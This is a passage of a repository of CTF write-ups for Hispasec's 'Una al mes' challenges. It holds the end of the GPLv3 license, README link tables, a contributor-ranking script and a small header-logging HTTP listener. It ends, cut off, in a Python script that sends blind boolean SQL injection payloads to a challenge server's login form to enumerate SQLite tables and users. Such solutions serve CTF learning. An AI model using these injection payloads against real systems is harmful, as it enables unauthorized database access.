526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 | 
536 |   Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 | 
540 |   12. No Surrender of Others' Freedom.
541 | 
542 |   If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License.  If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all.  For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 | 
552 |   13. Use with the GNU Affero General Public License.
553 | 
554 |   Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work.  The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 | 
563 |   14. Revised Versions of this License.
564 | 
565 |   The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time.  Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 | 
570 |   Each version is given a distinguishing version number.  If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation.  If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 | 
579 |   If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 | 
584 |   Later license versions may give you additional or different
585 | permissions.  However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 | 
589 |   15. Disclaimer of Warranty.
590 | 
591 |   THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 | 
600 |   16. Limitation of Liability.
601 | 
602 |   IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 | 
612 |   17. Interpretation of Sections 15 and 16.
613 | 
614 |   If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 | 
621 |                      END OF TERMS AND CONDITIONS
622 | 
623 |             How to Apply These Terms to Your New Programs
624 | 
625 |   If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 | 
629 |   To do so, attach the following notices to the program.  It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 | 
634 |     <one line to give the program's name and a brief idea of what it does.>
635 |     Copyright (C) <year>  <name of author>
636 | 
637 |     This program is free software: you can redistribute it and/or modify
638 |     it under the terms of the GNU General Public License as published by
639 |     the Free Software Foundation, either version 3 of the License, or
640 |     (at your option) any later version.
641 | 
642 |     This program is distributed in the hope that it will be useful,
643 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
644 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
645 |     GNU General Public License for more details.
646 | 
647 |     You should have received a copy of the GNU General Public License
648 |     along with this program.  If not, see <http://www.gnu.org/licenses/>.
649 | 
650 | Also add information on how to contact you by electronic and paper mail.
651 | 
652 |   If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 | 
655 |     <program>  Copyright (C) <year>  <name of author>
656 |     This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 |     This is free software, and you are welcome to redistribute it
658 |     under certain conditions; type `show c' for details.
659 | 
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License.  Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 | 
664 |   You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | <http://www.gnu.org/licenses/>.
668 | 
669 |   The GNU General Public License does not permit incorporating your program
670 | into proprietary programs.  If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library.  If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License.  But first, please read
674 | <http://www.gnu.org/philosophy/why-not-lgpl.html>.
675 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # unaalmes-writeups
 2 | Write-ups for UAM challenges.
 3 | 
 4 | <img src="https://i.imgur.com/StNpGr9.jpg" width="200" height="200">
 5 | 
 6 | https://unaalmes.hispasec.com
 7 | 
 8 | # Submissions
 9 | If you want to incorporate your own write-up send an email to: unaalmes@hispasec.com
10 | 
11 | # Contact
12 | You can contact to UAM administrators by Telegram or email.
13 |  - Telegram: https://t.me/joinchat/AKWAVkxjj1GTE_cvkvQvIQ
14 |  - E-mail: unaalmes@hispasec.com
15 |  # Challenges
16 | ## universomarvel
17 | | Episode | Writeups |
18 | |---|---|
19 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/bicacaro) <br>[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/arsenics) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/nachinho3) <br>[oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/oreos) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/rafamartos) <br>[1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/1v4n) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/julianjm) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/j0n3) <br>[victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/victormanuelleyva) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/darkeagle) <br>[masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1/masi) <br>|
20 | | **episodio1-2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/bicacaro) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/nachinho3) <br>[oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/oreos) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/julianjm) <br>[socialkas](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/socialkas) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/darkeagle) <br>[masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio1-2/masi) <br>|
21 | | **episodio2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/bicacaro) <br>[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/arsenics) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/julianjm) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/darkeagle) <br>[asterixco](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio2/asterixco) <br>|
22 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/bicacaro) <br>[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/arsenics) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/julianjm) <br>[bechma](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/bechma) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/universomarvel/episodio3/darkeagle) <br>|
23 | ## siliconvalley
24 | | Episode | Writeups |
25 | |---|---|
26 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/bicacaro) <br>[percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/percu) <br>[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/arsenics) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/nachinho3) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/rafamartos) <br>[rubenansotegui](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/rubenansotegui) <br>[tonicastillo](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/tonicastillo) <br>[1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/1v4n) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/darkeagle) <br>[ramonsola](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio1/ramonsola) <br>|
27 | | **episodio2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/bicacaro) <br>[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/arsenics) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/nachinho3) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/rafamartos) <br>[1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/1v4n) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio2/darkeagle) <br>|
28 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/bicacaro) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/nachinho3) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/rafamartos) <br>[1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/1v4n) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/siliconvalley/episodio3/darkeagle) <br>|
29 | ## missions
30 | | Episode | Writeups |
31 | |---|---|
32 | | **mission02:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission02/nachinho3) <br>[1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission02/1v4n) <br>|
33 | | **mission03:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission03/nachinho3) <br>|
34 | | **mission04:** |[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission04/j0n3) <br>|
35 | | **mission05:** |[percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/percu) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/nachinho3) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/rafamartos) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission05/j0n3) <br>|
36 | | **mission06:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission06/nachinho3) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission06/rafamartos) <br>[1v4n](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/missions/mission06/1v4n) <br>|
37 | ## matrix
38 | | Episode | Writeups |
39 | |---|---|
40 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/bicacaro) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/nachinho3) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/julianjm) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio1/darkeagle) <br>|
41 | | **episodio2:** |[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio2/nachinho3) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio2/julianjm) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio2/darkeagle) <br>|
42 | | **episodio3:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio3/arsenics) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio3/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/matrix/episodio3/darkeagle) <br>|
43 | ## lacasadepapel
44 | | Episode | Writeups |
45 | |---|---|
46 | | **episodio1-1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/bicacaro) <br>[percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/percu) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/nachinho3) <br>[alejandroparras](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/alejandroparras) <br>[oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/oreos) <br>[selankon](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/selankon) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/rafamartos) <br>[socialkas](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/socialkas) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/j0n3) <br>[victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/victormanuelleyva) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-1/darkeagle) <br>|
47 | | **episodio1-2:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/bicacaro) <br>[oreos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/oreos) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/rafamartos) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio1-2/darkeagle) <br>|
48 | | **episodio2:** |[percu](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/percu) <br>[cesarjz](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/cesarjz) <br>[rafamartos](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/rafamartos) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/j0n3) <br>[victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/victormanuelleyva) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio2/darkeagle) <br>|
49 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/bicacaro) <br>[blueudp](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/blueudp) <br>[cesarjz](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/cesarjz) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/j0n3) <br>[victormanuelleyva](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/victormanuelleyva) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/lacasadepapel/episodio3/darkeagle) <br>|
50 | ## futurama
51 | | Episode | Writeups |
52 | |---|---|
53 | | **episodio3-1:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/futurama/episodio3-1/arsenics) <br>|
54 | ## extra
55 | | Episode | Writeups |
56 | |---|---|
57 | | **extra:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/extra/extra/arsenics) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/extra/extra/j0n3) <br>[darkeagle](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/extra/extra/darkeagle) <br>|
58 | ## dragonball
59 | | Episode | Writeups |
60 | |---|---|
61 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/bicacaro) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/nachinho3) <br>[M3n0s_D0n4ld](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/M3n0s_D0n4ld) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/julianjm) <br>[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio1/j0n3) <br>|
62 | | **episodio2:** |[j0n3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio2/j0n3) <br>|
63 | | **episodio3:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio3/bicacaro) <br>[nachinho3](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio3/nachinho3) <br>[julianjm](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/dragonball/episodio3/julianjm) <br>|
64 | ## breakingbad
65 | | Episode | Writeups |
66 | |---|---|
67 | | **episodio 3:** |[rmartinsanta](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio%203/rmartinsanta) <br>|
68 | | **episodio1:** |[bicacaro](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio1/bicacaro) <br>[masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio1/masi) <br>|
69 | | **episodio2:** |[arsenics](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio2/arsenics) <br>[masi](https://github.com/sysdevploit/unaalmes-writeups/tree/master/writeups/breakingbad/episodio2/masi) <br>|
70 | # Contributors
71 | | # | Nickname | Contributions |
72 | |---|---|---:|
73 | | 1 | j0n3 | 15 |
74 | | 2 | darkeagle | 15 |
75 | | 3 | bicacaro | 14 |
76 | | 4 | nachinho3 | 14 |
77 | | 5 | arsenics | 9 |
78 | | 6 | rafamartos | 9 |
79 | | 7 | julianjm | 8 |
80 | | 8 | 1v4n | 6 |
81 | | 9 | oreos | 4 |
82 | | 10 | masi | 4 |
83 | | 11 | victormanuelleyva | 4 |
84 | | 12 | percu | 4 |
85 | | 13 | socialkas | 2 |
86 | | 14 | cesarjz | 2 |
87 | | 15 | asterixco | 1 |
88 | | 16 | bechma | 1 |
89 | | 17 | alejandroparras | 1 |
90 | | 18 | selankon | 1 |
91 | | 19 | blueudp | 1 |
92 | | 20 | rmartinsanta | 1 |
93 | | 21 | M3n0s_D0n4ld | 1 |
94 | | 22 | rubenansotegui | 1 |
95 | | 23 | tonicastillo | 1 |
96 | | 24 | ramonsola | 1 |
97 | 


--------------------------------------------------------------------------------
/README_top.md:
--------------------------------------------------------------------------------
 1 | # unaalmes-writeups
 2 | Write-ups for UAM challenges.
 3 | 
 4 | <img src="https://i.imgur.com/StNpGr9.jpg" width="200" height="200">
 5 | 
 6 | https://unaalmes.hispasec.com
 7 | 
 8 | # Submissions
 9 | If you want to incorporate your own write-up send an email to: unaalmes@hispasec.com
10 | 
11 | # Contact
12 | You can contact to UAM administrators by Telegram or email.
13 |  - Telegram: https://t.me/joinchat/AKWAVkxjj1GTE_cvkvQvIQ
14 |  - E-mail: unaalmes@hispasec.com
15 |  


--------------------------------------------------------------------------------
/contrib.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import urllib.parse
 3 | 
 4 | 
 5 | def create_contribs():
 6 |     contributions = dict()
 7 |     for challenge in os.scandir('writeups/'):
 8 |         if challenge not in contributions:
 9 |             contributions[challenge] = dict()
10 |         for episode in os.scandir('writeups/{}/'.format(challenge.name)):
11 |             if episode not in contributions[challenge]:
12 |                 contributions[challenge][episode] = []
13 |             for user in os.scandir('writeups/{}/{}/'.format(challenge.name, episode.name)):
14 |                 contributions[challenge][episode].append(user.name)
15 |     return contributions
16 | 
17 | 
18 | def contrib_rankings(contribs):
19 |     ranking = dict()
20 |     for challenge in contribs:
21 |         for episode in contribs[challenge]:
22 |             for user in contribs[challenge][episode]:
23 |                 if user not in ranking:
24 |                     ranking[user] = 1
25 |                 else:
26 |                     ranking[user] += 1
27 |     return ranking
28 | 
29 | 
30 | def md_template_ranking(ranking):
31 |     print("# Contributors")
32 |     rank_md_row = "| {} | {} | {} |"
33 |     print("| # | Nickname | Contributions |")
34 |     print("|---|---|---:|")
35 |     row = 1
36 |     for user in sorted(ranking, key=ranking.__getitem__, reverse=True):
37 |         row_format = rank_md_row.format(row, user, ranking[user])
38 |         print(row_format)
39 |         row += 1
40 | 
41 | 
42 | def md_template_contribs(contribs):
43 |     writeups_dir = "writeups"
44 |     github_url_format = "https://github.com/sysdevploit/unaalmes-writeups/tree/master/{}/{}"
45 |     print("# Challenges")
46 |     sorted_challenges = sorted(contribs, key=lambda x: x.name, reverse=True)
47 |     for challenge in sorted_challenges:
48 |         print("## {}".format(challenge.name))
49 |         print("| Episode | Writeups |")
50 |         print("|---|---|")
51 |         sorted_episodes = sorted(contribs[challenge], key=lambda x: x.name, reverse=False)
52 |         for episode in sorted_episodes:
53 |             print("| **{}:** |".format(episode.name), end="")
54 |             for user in contribs[challenge][episode]:
55 |                 params = "{}/{}/{}" \
56 |                     .format(urllib.parse.quote(challenge.name),
57 |                             urllib.parse.quote(episode.name),
58 |                             urllib.parse.quote(user))
59 |                 print("[{}]({}) <br>" \
60 |                       .format(user, github_url_format.format(writeups_dir, params), end=""), end="")
61 |             print("|")
62 | 
63 | 
64 | if __name__ == '__main__':
65 |     contributors = create_contribs()
66 |     ranking = contrib_rankings(contributors)
67 | 
68 |     md_template_contribs(contributors)
69 |     md_template_ranking(ranking)
70 | 


--------------------------------------------------------------------------------
/generate_readme.sh:
--------------------------------------------------------------------------------
1 | #/bin/env bash
2 | 
3 | cat 'README_top.md' > README.md
4 | python3 contrib.py >> README.md


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio 3/rmartinsanta/rmartinsanta.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio 3/rmartinsanta/rmartinsanta.pdf


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/bicacaro/BREAKING_BAD_EP1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/breakingbad/episodio1/bicacaro/BREAKING_BAD_EP1.pdf


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/bicacaro/web.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #
 4 | import struct
 5 | from operator import *
 6 | from http.server import HTTPServer, BaseHTTPRequestHandler
 7 | 
 8 | 
 9 | class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
10 | 
11 | 	def do_GET(self):
12 | 		print (self.headers)
13 | 		self.protocol_version='HTTP/1.1'
14 | 		self.send_response(200, 'OK')
15 | 		self.send_header('Content-type', 'text/html')
16 | 		self.end_headers()
17 | 		self.wfile.write(bytes("<html> <head><title> OK</title> </head> <body>"))
18 | 
19 | httpd = HTTPServer(('', 64010), SimpleHTTPRequestHandler)
20 | httpd.serve_forever()
21 | 


--------------------------------------------------------------------------------
/writeups/breakingbad/episodio1/masi/login_brute_sqli.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | from hashlib import sha512
  3 | from flask.sessions import session_json_serializer
  4 | from itsdangerous import URLSafeTimedSerializer, BadTimeSignature
  5 | import base64
  6 | import zlib
  7 | from cuteprint.cuteprint import PrettyPrinter
  8 | import sys
  9 | import requests
 10 | import urllib3
 11 | import string
 12 | import urllib
 13 | import time
 14 | #from tqdm import tqdm
 15 | urllib3.disable_warnings()
 16 | 
 17 | p = PrettyPrinter()
 18 | def getMaxTables():
 19 |     p.print_good('MAX TABLES:')
 20 | 
 21 |     url='http://34.253.120.147:1730/login'
 22 |     headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 23 |     for i in range(0,255):
 24 |         username="username=%' OR (SELECT CASE WHEN ((SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' )="+str(i)+") THEN '1' ELSE '0' END)='1&password=1234&submit=Login"
 25 |         with requests.Session() as s:
 26 |             payload='username=%s&password=1234=&submit=Login' % (username)
 27 |             r = s.post(url, data = payload, headers = headers, verify = False, allow_redirects = False)
 28 |             cookies=s.cookies.get_dict()
 29 |             cookie=cookies['session']
 30 |             session_payload = cookie.split('.')[0]
 31 |             
 32 |             if r.status_code == 302 and session_payload=='eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkluY29ycmVjdCBwYXNzd29yZCBmb3IgdXNlciBQZXBpIl19XX0':
 33 |                 print("\t\t %s tables found." % (i))
 34 |                 i += 1
 35 |                 break
 36 | 
 37 | def getMaxUsers():
 38 |     p.print_good('MAX USERS:')
 39 | 
 40 |     url='http://34.253.120.147:1730/login'
